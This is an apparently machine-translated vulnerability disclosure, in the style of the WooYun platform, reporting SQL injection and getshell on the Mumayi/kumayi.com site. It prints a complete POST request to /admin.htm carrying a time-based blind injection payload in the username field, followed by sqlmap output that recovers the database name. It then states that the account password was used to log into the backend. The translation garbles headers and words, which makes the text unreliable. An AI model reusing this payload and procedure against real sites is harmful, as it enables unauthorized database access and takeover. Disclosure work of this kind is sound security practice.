漏洞标题 SQL ant有一个SQL注入/和Getshell 相关制造商 Mumayi.com 漏洞作者 过路人 提交时间 2016-04-30 09: 41 公共时间 2016-06-17 10: 20 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 漏洞详细信息 在木蚂蚁站中有SQL注入,并且是gethell Kumayi.com 失明后 POST /admin.htm HTTP/1.1 内容长度: 215 内容类型: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer:http://www.kumayi.com: 80 / Cookie: PHPSESSID=12k6poruju02v827qqkf961ja4 主机: www.kumayi.com 连接:保持活动状态 Accept-Encoding: gzip,deflate 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML,与Gecko一样)Chrome/41.0.2228.0 Safari/537.21 接受: */* 电子邮件=样品%40email.tst和放大器;密码=g00dPa%24%24w0rD和放大器;记住=记得,我和放大器;用户名=IF(NOW()%3dsysdate()%2csleep(0)%2C0)/*'XOR(如果(现( )%3dsysdate()%2csleep(0)%2C0))OR'%22XOR(如果(现在的()%3dsysdate()%2csleep(0)%2C0))OR%22 * / 漏洞证明: [18: 19: 30] [INFO]后端DBMS是MySQL Web应用程序技术: Nginx,PHP 5.3.21 后端DBMS: MySQL 5 [18: 19: 30] [INFO]获取数据库名称 [18: 19: 30] [INFO]获取数据库数量 [18: 19: 30] [INFO]恢复: 6 [18: 19: 30] [警告](案例)基于时间的比较需要更大的统计数据 [18: 19: 30] [CRITICAL]无法连接到目标URL或代理。 sqlmap去了 Ing重试请求 ........(已完成) [18: 19: 42] [警告]不要对网络适配器duri施加压力非常重要 Ng使用基于时间的有效负载来防止潜在的中断 [18: 19: 43] [警告]如果出现连续数据检索问题,建议您使用 Ed尝试切换'--no-cast'或切换' - hex' [18: 19: 43] [INFO]检索到: 您是否希望sqlmap尝试优化DBMS延迟响应的值(选项 '--time秒')? [是/否] y [18: 20: 24] [ERROR]检测到无效字符。重试. [18: 20: 24] [警告]将时间延迟增加到6秒 [18: 20: 26] [INFO]检索到: [18: 20: 29] [INFO]检索到: [18: 20: 32] [INFO]检索到: [18: 20: 34] [INFO]检索到: [18: 20: 38] [INFO]回到当前数据库 [18: 20: 38] [INFO]获取当前数据库 [18: 20: 38] [INFO]恢复了: kumayipay_kumayi 可用数据库[1]: [*] kumayipay_kumayi [18: 20: 38] [INFO]获取记录到'C: \ Users \ Administrato下的文本文件的数据 r \ .sqlmap \输出\ www.kumayi.com”
获取帐户密码后,登录后台。
修理计划: 过滤 版权声明:请注明出处。居民A @乌云